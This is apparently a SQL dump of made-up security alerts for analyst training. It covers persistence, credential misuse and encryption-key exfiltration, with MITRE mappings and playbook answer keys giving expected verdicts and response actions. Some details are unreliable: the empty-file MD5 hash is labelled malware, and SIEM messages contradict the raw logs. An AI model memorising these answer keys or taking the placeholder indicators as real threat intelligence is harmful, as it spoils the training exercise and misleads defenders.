(894, 'Backdoor Persistence Mechanism Activated', 'high', 'System logs', 'An advanced persistence mechanism was activated on the compromised machine, allowing the attacker to maintain access without re-exploiting vulnerabilities. This action is characteristic of advanced persistent threats that aim to stay undetected for extended periods.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:18Z\",\"event_id\":\"4720\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"user\":\"compromised_user\",\"action\":\"Scheduled Task Created\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\CriticalUpdate\",\"task_command\":\"C:\\\\Windows\\\\System32\\\\wscript.exe C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\update.vbs\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_name\":\"update.vbs\"}', '2026-01-15 00:59:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address of compromised machine.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in multiple malware reports.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update.vbs\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Script used to maintain 
persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:18Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update.vbs\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"update.vbs\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:18Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Scheduled Task 
Created\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update.vbs\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"update.vbs\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:18Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update.vbs\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"update.vbs\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:18Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe 
C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update.vbs\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"update.vbs\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:18Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update.vbs\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"update.vbs\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(895, 'Unauthorized Access to Corporate Cloud Environment', 'high', 'Cloud access logs', 'An attacker used stolen credentials to move laterally into the corporate cloud environment from a compromised home machine. The attacker targeted critical infrastructure and attempted to access sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.20.30.40\",\"user\":\"jdoe\",\"action\":\"login\",\"status\":\"success\",\"auth_method\":\"password\",\"suspicious_file\":\"malicious_payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"accessed_resource\":\"sensitive_data_vault\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-15 00:59:56', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Corporate cloud environment IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials were compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.572Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.20.30.40\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"auth_method\\\":\\\"password\\\",\\\"suspicious_file\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"accessed_resource\\\":\\\"sensitive_data_vault\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.572Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.20.30.40\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"auth_method\\\":\\\"password\\\",\\\"suspicious_file\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"accessed_resource\\\":\\\"sensitive_data_vault\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.572Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.20.30.40\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"auth_method\\\":\\\"password\\\",\\\"suspicious_file\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"accessed_resource\\\":\\\"sensitive_data_vault\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.572Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.20.30.40\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"auth_method\\\":\\\"password\\\",\\\"suspicious_file\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"accessed_resource\\\":\\\"sensitive_data_vault\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.572Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.20.30.40\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"auth_method\\\":\\\"password\\\",\\\"suspicious_file\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"accessed_resource\\\":\\\"sensitive_data_vault\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(896, 'Extraction of Encryption Keys from Cloud Storage', 'critical', 'Data access logs', 'An advanced exfiltration operation targeting cloud storage for the extraction of encryption keys used to decrypt user vaults. The attacker accessed and exfiltrated sensitive encryption keys stored within a cloud environment, potentially compromising the integrity of encrypted data for millions of users.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-28T13:45:27Z\",\"event_id\":\"9876543210\",\"action\":\"EXFILTRATION\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.42\",\"username\":\"malicious_actor\",\"file_exfiltrated\":\"encryption_keys_backup_20231028.tar.gz\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"cloud_service_provider\":\"aws\",\"bucket_name\":\"sensitive-keys-backup\",\"user_agent\":\"python-requests/2.25.1\",\"status\":\"SUCCESS\"}', '2026-01-15 00:59:56', '2026-02-16 17:55:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligencePlatform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalLogs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the cloud storage server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"malicious_actor\",\"is_critical\":true,\"osint_result\":{\"source\":\"SecurityReports\",\"verdict\":\"malicious\",\"details\":\"Username used in previous unauthorized access attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encryption_keys_backup_20231028.tar.gz\",\"is_critical\":true,\"osint_result\":{\"source\":\"FileAnalysis\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive encryption 
keys.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash linked to potential data exfiltration scripts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.574Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-28T13:45:27Z\\\",\\\"event_id\\\":\\\"9876543210\\\",\\\"action\\\":\\\"EXFILTRATION\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.42\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"file_exfiltrated\\\":\\\"encryption_keys_backup_20231028.tar.gz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"cloud_service_provider\\\":\\\"aws\\\",\\\"bucket_name\\\":\\\"sensitive-keys-backup\\\",\\\"user_agent\\\":\\\"python-requests/2.25.1\\\",\\\"status\\\":\\\"SUCCESS\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.574Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-28T13:45:27Z\\\",\\\"event_id\\\":\\\"9876543210\\\",\\\"action\\\":\\\"EXFILTRATION\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.42\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"file_exfiltrated\\\":\\\"encryption_keys_backup_20231028.tar.gz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"cloud_service_provider\\\":\\\"aws\\\",\\\"bucket_name\\\":\\\"sensitive-keys-backup\\\",\\\"user_agent\\\":\\\"python-requests/2.25.1\\\",\\\"status\\\":\\\"SUCCESS\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.574Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-28T13:45:27Z\\\",\\\"event_id\\\":\\\"9876543210\\\",\\\"action\\\":\\\"EXFILTRATION\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.42\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"file_exfiltrated\\\":\\\"encryption_keys_backup_20231028.tar.gz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"cloud_service_provider\\\":\\\"aws\\\",\\\"bucket_name\\\":\\\"sensitive-keys-backup\\\",\\\"user_agent\\\":\\\"python-requests/2.25.1\\\",\\\"status\\\":\\\"SUCCESS\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.574Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-28T13:45:27Z\\\",\\\"event_id\\\":\\\"9876543210\\\",\\\"action\\\":\\\"EXFILTRATION\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.42\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"file_exfiltrated\\\":\\\"encryption_keys_backup_20231028.tar.gz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"cloud_service_provider\\\":\\\"aws\\\",\\\"bucket_name\\\":\\\"sensitive-keys-backup\\\",\\\"user_agent\\\":\\\"python-requests/2.25.1\\\",\\\"status\\\":\\\"SUCCESS\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.574Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-28T13:45:27Z\\\",\\\"event_id\\\":\\\"9876543210\\\",\\\"action\\\":\\\"EXFILTRATION\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.42\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"file_exfiltrated\\\":\\\"encryption_keys_backup_20231028.tar.gz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"cloud_service_provider\\\":\\\"aws\\\",\\\"bucket_name\\\":\\\"sensitive-keys-backup\\\",\\\"user_agent\\\":\\\"python-requests/2.25.1\\\",\\\"status\\\":\\\"SUCCESS\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(897, 'Potential Threat to User Master Passwords Assessed', 'high', 'Threat intelligence reports', 'An advanced risk assessment was conducted following a breach, evaluating the potential exposure of user master passwords. Indicators of compromise (IoCs) include malicious IP addresses and suspect file hashes. Immediate action is required to mitigate any further risk and protect user data.', 'Risk Assessment', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:30:00Z\",\"event_type\":\"breach_assessment\",\"internal_ip\":\"10.0.1.45\",\"external_ip\":\"203.0.113.5\",\"user\":\"admin_user\",\"filename\":\"compromised_data_dump.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_ips\":[\"203.0.113.5\",\"198.51.100.10\"],\"compromised_users\":[\"admin_user\",\"user123\"],\"detected_malware\":[\"APT_Backdoor_v1\"],\"actions_taken\":[\"password_reset_initiated\",\"forensics_collection\"]}', '2026-01-15 00:59:56', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT malware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"compromised_data_dump.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File suspected to contain exfiltrated user data\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Account seen in unusual login 
patterns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.575Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:30:00Z\\\",\\\"event_type\\\":\\\"breach_assessment\\\",\\\"internal_ip\\\":\\\"10.0.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"compromised_data_dump.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_ips\\\":[\\\"203.0.113.5\\\",\\\"198.51.100.10\\\"],\\\"compromised_users\\\":[\\\"admin_user\\\",\\\"user123\\\"],\\\"detected_malware\\\":[\\\"APT_Backdoor_v1\\\"],\\\"actions_taken\\\":[\\\"password_reset_initiated\\\",\\\"forensics_collection\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:22.575Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:30:00Z\\\",\\\"event_type\\\":\\\"breach_assessment\\\",\\\"internal_ip\\\":\\\"10.0.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"compromised_data_dump.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_ips\\\":[\\\"203.0.113.5\\\",\\\"198.51.100.10\\\"],\\\"compromised_users\\\":[\\\"admin_user\\\",\\\"user123\\\"],\\\"detected_malware\\\":[\\\"APT_Backdoor_v1\\\"],\\\"actions_taken\\\":[\\\"password_reset_initiated\\\",\\\"forensics_collection\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:22.575Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:30:00Z\\\",\\\"event_type\\\":\\\"breach_assessment\\\",\\\"internal_ip\\\":\\\"10.0.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"compromised_data_dump.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_ips\\\":[\\\"203.0.113.5\\\",\\\"198.51.100.10\\\"],\\\"compromised_users\\\":[\\\"admin_user\\\",\\\"user123\\\"],\\\"detected_malware\\\":[\\\"APT_Backdoor_v1\\\"],\\\"actions_taken\\\":[\\\"password_reset_initiated\\\",\\\"forensics_collection\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:22.575Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:30:00Z\\\",\\\"event_type\\\":\\\"breach_assessment\\\",\\\"internal_ip\\\":\\\"10.0.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"compromised_data_dump.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_ips\\\":[\\\"203.0.113.5\\\",\\\"198.51.100.10\\\"],\\\"compromised_users\\\":[\\\"admin_user\\\",\\\"user123\\\"],\\\"detected_malware\\\":[\\\"APT_Backdoor_v1\\\"],\\\"actions_taken\\\":[\\\"password_reset_initiated\\\",\\\"forensics_collection\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:22.575Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 